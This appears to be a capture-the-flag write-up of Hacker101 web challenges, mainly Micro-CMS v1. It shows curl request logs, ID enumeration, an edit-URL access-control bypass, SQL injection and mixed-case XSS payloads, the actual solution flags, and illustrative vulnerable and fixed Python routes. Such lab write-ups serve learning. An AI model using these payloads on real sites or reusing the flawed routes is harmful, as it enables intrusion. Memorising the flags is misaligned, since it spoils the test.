Introduction
Hacker101 CTF seems to be a new CTF set up by HackerOne, the bug bounty program. Flag formats are meant to be similar to ^FLAG^37ae568362f974017fa575f08cd215044cd6bb395c3f5e5e293ee5324ba6769c$FLAG$. It requires a HackerOne account to log in. Additional instructions can be found at https://docs.hackerone.com/hackers/hacker101.html.
The challenge difficulty ranking uses trivial, easy, moderate, hard, and expert. Points are allocated according to difficulty and range from 1 point for trivial to 9 points for expert. Each challenge may have multiple flags, as indicated by the completion status. The minimum number of flags per challenge was 1, with a maximum of 7 for the Postbook challenge.
WARNING: This post contains actual flags.
Trivial (1 / flag) - A little something to get you started - Web
- Navigated to http://35.227.24.107/a5fa082820/
curl -v http://35.227.24.107/a5fa082820/
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:11:47 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 194
< Connection: keep-alive
<
<!doctype html>
<html>
<head>
<style>
body {
background-image: url("background.png");
}
</style>
</head>
<body>
<p>Welcome to level 0. Enjoy your stay.</p>
</body>
</html>
* Connection #0 to host 35.227.24.107 left intact
- Hint: Take a look at the source for the page
- Attempted http://35.227.24.107/a5fa082820/background.png
curl -v http://35.227.24.107/a5fa082820/background.png
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/background.png HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:16:02 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 76
< Connection: keep-alive
<
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$* Connection #0 to host 35.227.24.107 left intact
- Submitted:
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$
Easy (2 / flag) - Micro-CMS v1 - Web
- Navigated to http://35.227.24.107/06e5e5463a/
curl -v http://35.227.24.107/06e5e5463a/
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /06e5e5463a/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:18:32 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 236
< Connection: keep-alive
<
<!doctype html>
<html>
<head>
<title>Micro-CMS</title>
</head>
<body>
<ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
</ul>
<a href="page/create">Create a new page</a>
</body>
</html>
* Connection #0 to host 35.227.24.107 left intact
- Manually navigated the site and explored the page preview and edit functions, created a page, and noticed that the newly created page was numbered 13
- Iterated through all pages from 1 to 13, saving the output to a file for manual review, using
for /l %i in (1,1,13) do ( curl -v http://35.227.24.107/06e5e5463a/page/%i ) >> Micro-CMS_v1.txt
- The majority of pages returned a 404 error message indicating that the page was not found
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
- However, one page (page 6) returned a 403 message instead, indicating that the page exists but is protected
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>
- Attempted to reach it through the editor instead: opened the edit view of the test page I had created and then changed the page ID in the URL to 6, i.e.
http://35.227.24.107/06e5e5463a/page/edit/6
- Found a flag
My secret is ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
- Submitted:
^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
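As an added illustration (not Micro-CMS's own code) of why page/6 answers 403 while page/edit/6 hands over the content: the view route enforces a read-protection flag, the edit route never does, and the fix is one shared authorization helper that every route must call. The page data and function names below are constructed for this example.

```python
from dataclasses import dataclass

@dataclass
class Page:
    title: str
    body: str
    protected: bool = False  # read-protected pages answer 403 on view

# Constructed sample data: page 6 plays the part of the protected page.
PAGES = {
    1: Page("Testing", "This is a test page."),
    6: Page("Private", "My secret is FLAG_PLACEHOLDER", protected=True),
}

def view_page(page_id):
    """Viewer route: the only place the protection flag is enforced."""
    page = PAGES.get(page_id)
    if page is None:
        return 404, "Not Found"
    if page.protected:
        return 403, "Forbidden"
    return 200, page.body

def edit_page_vulnerable(page_id):
    """Editor route as the challenge behaves: the check lives only in
    view_page, so the protected body is served through the edit form."""
    page = PAGES.get(page_id)
    if page is None:
        return 404, "Not Found"
    return 200, page.body

def authorize(page_id):
    """Single authorization decision for every route that touches a page.
    Returns (status, page); page is None unless status is 200."""
    page = PAGES.get(page_id)
    if page is None:
        return 404, None
    if page.protected:
        return 403, None
    return 200, page

def edit_page_fixed(page_id):
    """Hardened editor route: reuses authorize(), so view and edit can no
    longer disagree about who may read a page."""
    status, page = authorize(page_id)
    if status != 200:
        return status, {403: "Forbidden", 404: "Not Found"}[status]
    return 200, page.body
```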
- Realised that this challenge had multiple flags; could not find anything else, so went to the hints for the challenge and got
Hints for "Micro-CMS v1"
Flag0 -- Found
Try creating a new page
How are pages indexed?
Look at the sequence of IDs
If the front door doesn't open, try the window
In what ways can you retrieve page contents?
Flag1 -- Not Found
You don't have any hints for this flag yet.
Flag2 -- Not Found
You don't have any hints for this flag yet.
Flag3 -- Not Found
You don't have any hints for this flag yet.
- Clicked on the "Get a hint" button and got
Make sure you tamper with every input
- Attempted basic SQL injection - no result
- Attempted JavaScript injection: <script> tags are replaced with <scrubbed> in the CMS page, and the < and > characters are replaced by their HTML entity equivalents, so some input sanitisation is occurring. Payload used: ' OR 1=1; --x <Script>alert("hello world");
- It wasn't until the "<-- Go Home" link is clicked that the JavaScript injection actually triggers; we get a JavaScript pop-up with the flag
- Submitted:
^FLAG^468c7fb39ff2b5b8d10eff89231d39521e430bef688904069211feedb5215d11$FLAG$
- Since the JavaScript triggered on the home page, manually navigated to all other pages and edit pages to see if another script triggered.
- Discovered that the Markdown Test page cannot be saved because the URL to the adorable kitten image is broken.
- Tried injecting in the CMS page content and manually navigated to other pages
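As an added illustration (not Micro-CMS's code) of the two observations above, the scrub that misses a differently cased <Script> tag and the script firing only once the home page rendered the stored content: a blacklist filter beside contextual output encoding, both run over the write-up's payload. That the page title reached the home-page link unfiltered is an assumption about where the CMS applied its filter; the function names are constructed.

```python
import html
import re

# Payload from the write-up; note the capital S that a literal match misses.
PAYLOAD = "' OR 1=1; --x <Script>alert(\"hello world\");"

def scrub_naive(text):
    """Blacklist filter as observed: lowercase <script> tags become
    <scrubbed>; a differently cased tag passes untouched."""
    return text.replace("<script>", "<scrubbed>").replace("</script>", "<scrubbed>")

def contains_active_tag(fragment):
    """True if a rendered HTML fragment still carries a real script tag."""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None

def render_vulnerable(title, body):
    """Assumed layout of the flawed CMS: the body is scrubbed, but the title
    is dropped raw into the home-page link, so it fires on 'Go Home'."""
    home = f'<li><a href="page/13">{title}</a></li>'
    page = f"<h1>{title}</h1><p>{scrub_naive(body)}</p>"
    return home, page

def render_fixed(title, body):
    """Hardened version: encode at every output site, whatever the case or
    spelling of the input; html.escape handles < > & and both quotes."""
    safe_title, safe_body = html.escape(title), html.escape(body)
    home = f'<li><a href="page/13">{safe_title}</a></li>'
    page = f"<h1>{safe_title}</h1><p>{safe_body}</p>"
    return home, page

def leaks_script(render):
    """Feed the payload into both fields and report whether any output
    fragment still contains an executable script tag."""
    return any(contains_active_tag(frag) for frag in render(PAYLOAD, PAYLOAD))
```

The blacklist is bypassed by a one-character case change, while escaping at the output site neutralises the same input without having to guess what the next bypass looks like.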